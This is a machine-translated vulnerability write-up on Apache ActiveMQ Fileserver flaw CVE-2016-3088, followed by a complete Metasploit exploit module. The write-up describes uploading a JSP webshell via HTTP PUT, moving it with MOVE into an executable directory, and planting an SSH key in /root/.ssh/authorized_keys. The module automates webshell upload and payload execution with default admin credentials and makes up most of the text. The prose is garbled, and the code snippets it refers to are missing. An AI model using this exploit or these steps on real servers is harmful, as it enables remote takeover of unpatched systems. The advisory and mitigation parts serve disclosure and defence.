Author: The know Chong Yu 404 laboratory
ActiveMQ is an Apache Software Foundation under an open source message-driven middleware software. Jetty is an open source servlet container, it is based on Java web container such as JSP and servlet to provide the running environment. ActiveMQ 5.0 and later versions the default integrated jetty. After the start to provide a monitoring ActiveMQ Web application.
2016 4 November 14, the overseas security researchers Simon Zuckerbraun exposure Apache ActiveMQ Fileserver there are multiple security vulnerabilities allowing a remote attacker to use malicious code to replace the Web application on an affected system to remote code executionοΌCVE-2016-3088οΌγ
ActiveMQ in the FileServer service allows the user through the HTTP PUT method to upload a file to a specified directory,download ActiveMQ 5.7.0 source code , you can see the background processing PUT the key code is as follows
The user can upload a file to a specified directory, the path in the conf/jetty.xml
in the definition, as follows
Interestingly, we forged a special upload path, you can burst an absolute path
Along the PUT method to track, you can see the call to the following function
At the same time see the background processing to MOVE the key code is as follows, You can see the method is not for the purpose of path any restrictions or filtering.
Thus, we can construct a PUT request to upload a webshell to the fileserver directory, and then by the Move method to move it to have execute permissions for the admin/ directory.
According to the above vulnerability principle, we can think of a variety of the use of poses.
Note: the following results are in the ActiveMQ 5.7.0 in the reproduction, the reproduction process of the MOVE method use is very unstable.
First PUT a Jsp Webshell to the fileserver directory
In the fileserver/ directory Webshell and no execute permissions
Proof about the absolute path
Then use the MOVE method to the Webshell moved into the admin/ directory, you can also use relative paths
Visit http://localhost:8161/admin/1. jsp? cmd=ls, the command successfully executes, the results are as follows
Since can be arbitrary file upload and moving, very natural can think to upload our ssh public key, enabling SSH login.
First generate the key pair. If itβs already there then not required
Then upload, move to the/root/. ssh/
and rename to authorized_keys
Directly after the ssh login.
The vulnerability affects versions: Apache ActiveMQ 5. x ~ 5.14.0
In ZoomEye with date and ActiveMQ as a key to retrieve, respectively, the detection of the 2015 1 month 1 day vulnerability before the outbreak of the one year and 2017 year 1 month 1 day vulnerability after the outbreak of the one year Internet on ActiveMQ the total amount of the case, as follows.
You can see that ActiveMQ in the number of vulnerabilities the outbreak of the front and rear there is a very substantial reduction, from which we can generally guess the vulnerabilities after the outbreak of the many ActiveMQ Web service is restricted from public access.
1, The ActiveMQ Fileserver function in 5.14.0 and later versions has been removed. Users are recommended to upgrade to 5.14.0 and later versions.
2, by removing conf\jetty.xml
the following configuration to disable the ActiveMQ Fileserver function
[1] http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
[2] https://www.seebug.org/vuldb/ssvid-96268
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'ActiveMQ web shell upload',
'Description' => %q(
The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0
allows remote attackers to upload and execute arbitrary files via an
HTTP PUT followed by an HTTP MOVE request.
),
'Author' => [ 'Ian Anderson <andrsn84[at]gmail.com>', 'Hillary Benson <1n7r1gu3[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-3088' ],
[ 'URL', 'http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt' ]
],
'Privileged' => true,
'Platform' => %w{ java linux win },
'Targets' =>
[
[ 'Java Universal',
{
'Platform' => 'java',
'Arch' => ARCH_JAVA
}
],
[ 'Linux',
{
'Platform' => 'linux',
'Arch' => ARCH_X86
}
],
[ 'Windows',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
]
],
'DisclosureDate' => "Jun 01 2016",
'DefaultTarget' => 0))
register_options(
[
OptString.new('BasicAuthUser', [ true, 'The username to authenticate as', 'admin' ]),
OptString.new('BasicAuthPass', [ true, 'The password for the specified username', 'admin' ]),
OptString.new('JSP', [ false, 'JSP name to use, excluding the .jsp extension (default: random)', nil ]),
OptString.new('AutoCleanup', [ false, 'Remove web shells after callback is received', 'true' ]),
Opt::RPORT(8161)
])
register_advanced_options(
[
OptString.new('UploadPath', [false, 'Custom directory into which web shells are uploaded', nil])
])
end
def jsp_text(payload_name)
%{
<%@ page import="java.io.*"
%><%@ page import="java.net.*"
%><%
URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath("./#{payload_name}.jar")).toURI().toURL()});
Class c = cl.loadClass("metasploit.Payload");
c.getMethod("main",Class.forName("[Ljava.lang.String;")).invoke(null,new java.lang.Object[]{new java.lang.String[0]});
%>}
end
def exploit
jar_payload = payload.encoded_jar.pack
payload_name = datastore['JSP'] || rand_text_alpha(8 + rand(8))
host = "#{datastore['RHOST']}:#{datastore['RPORT']}"
@url = datastore['SSL'] ? "https://#{host}" : "http://#{host}"
paths = get_upload_paths
paths.each do |path|
if try_upload(path, jar_payload, payload_name)
break handler if trigger_payload(payload_name)
print_error('Unable to trigger payload')
end
end
end
def try_upload(path, jar_payload, payload_name)
['.jar', '.jsp'].each do |ext|
file_name = payload_name + ext
data = ext == '.jsp' ? jsp_text(payload_name) : jar_payload
move_headers = { 'Destination' => "#{@url}#{path}#{file_name}" }
upload_uri = normalize_uri('fileserver', file_name)
print_status("Uploading #{move_headers['Destination']}")
register_files_for_cleanup "#{path}#{file_name}" if datastore['AutoCleanup'].casecmp('true')
return error_out unless send_request('PUT', upload_uri, 204, 'data' => data) &&
send_request('MOVE', upload_uri, 204, 'headers' => move_headers)
@trigger_resource = /webapps(.*)/.match(path)[1]
end
true
end
def get_upload_paths
base_path = "#{get_install_path}/webapps"
custom_path = datastore['UploadPath']
return [normalize_uri(base_path, custom_path)] unless custom_path.nil?
[ "#{base_path}/api/", "#{base_path}/admin/" ]
end
def get_install_path
properties_page = send_request('GET', "#{@url}/admin/test/systemProperties.jsp").body
match = properties_page.tr("\n", '@').match(/activemq\.home<\/td>@\s*<td>([^@]+)<\/td>/)
return match[1] unless match.nil?
end
def send_request(method, uri, expected_response = 200, opts = {})
opts['headers'] ||= {}
opts['headers']['Authorization'] = basic_auth(datastore['BasicAuthUser'], datastore['BasicAuthPass'])
opts['headers']['Connection'] = 'close'
r = send_request_cgi(
{
'method' => method,
'uri' => uri
}.merge(opts)
)
return false if r.nil? || expected_response != r.code.to_i
r
end
def trigger_payload(payload_name)
send_request('POST', @url + @trigger_resource + payload_name + '.jsp')
end
def error_out
print_error('Upload failed')
@trigger_resource = nil
false
end
end